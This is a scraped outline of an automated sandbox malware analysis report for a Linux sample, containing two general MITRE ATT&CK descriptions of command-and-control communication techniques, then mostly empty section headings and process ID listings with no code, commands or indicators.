Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Linux Analysis Report HCyigyiCAH

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Process Tree

Yara Overview

Initial Sample

PCAP (Network Traffic)

Jbx Signature Overview

AV Detection:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Runtime Messages

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

System Behavior

Analysis Process: HCyigyiCAH PID: 5287 Parent PID: 5119

General

Analysis Process: HCyigyiCAH PID: 5292 Parent PID: 5287

General

Analysis Process: HCyigyiCAH PID: 5293 Parent PID: 5287

General

Analysis Process: HCyigyiCAH PID: 5296 Parent PID: 5287

General

Analysis Process: HCyigyiCAH PID: 5297 Parent PID: 5287

General

Analysis Process: HCyigyiCAH PID: 5299 Parent PID: 5287

General